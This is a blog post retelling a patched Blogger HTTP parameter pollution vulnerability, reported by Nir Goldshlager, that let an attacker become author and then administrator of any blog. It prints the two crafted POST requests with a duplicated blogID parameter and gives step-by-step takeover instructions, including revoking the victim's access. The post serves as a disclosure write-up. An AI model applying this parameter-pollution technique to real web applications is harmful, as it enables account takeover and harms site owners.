Vulnerability Patched-Gaining Administerator Priviliges On any Blogger Account



Recently months back, a vulnerability was found in blogger.com using which anyone could gain access to any blogger account. It was HTTP Parameter Pollution vulnerability. Some kinda permission problem, exploiting which, could be used to permit Hacker as blog author and an admin later. Source of this news is Nir Golshlager who participated in Google reward program and found some High, Serious vulnerabilities. It sounds crazy but still it is true. He also gave video demonstration of this issue (Attached at end of post).

Technical details:

Here is the concise procdure for getting admin control permissions over any blogger account.

1. The attacker Use the invite author options in blogger (add authors):

Vulnerability location:

POST /add-authors.do HTTP/1.1
Request:

security_token=attackertoken&blogID=attackerblogidvalue&blogID=victimblogidvalue&authorsList=goldshlager19test%40gmail.com(attacker email)&ok=Invite
As you can see I added two blogid value in my post request (blogID=attackerblogidvalue&blogID=victimblogidvalue)


The server checks the first blog-id value and executes the second blog-id value of the attacker.


2. After that the attacker receives a mail to confirm him as a author (author invitation link as we invite someone for our blog to post articles as author), After that, the attacker will be added as an author on the victim account.


3. At this step it becomes possible to modify the attacker permission from an author to an administrator,
Vulnerability Location:
POST /team-member-modify.do HTTP/1.1
Request:
security_token=attackertoken&blogID=attackerownblogid&blogID=victimblogidvalue&memberID=attackermemberid&isAdmin=true&ok=Grant+admin+privileges
as you can see there is Another field in this request called  memberID,

Any users in blogger have a memberID value, so the attacker also need to provide his memberId value in this post request, In Blogger service, any Administrator, Author have a memberid value, So to make a successful attack (become administrator),an attacker must add himself first as a author on the victim account, To perform the next step that will add himself as an administrator on the victim account.Thus now attacker will revoke administrator priviliges from the victim and will enjoy the blog.


To watch video presentation of this hack, Go here.

Note: This was reported by Nir.Goldshlager to google team and thus this vulnerability has been patched. I found this interesting therefore sharing here at Hackers Thirst.
Source of News:
Nir.Goldshlager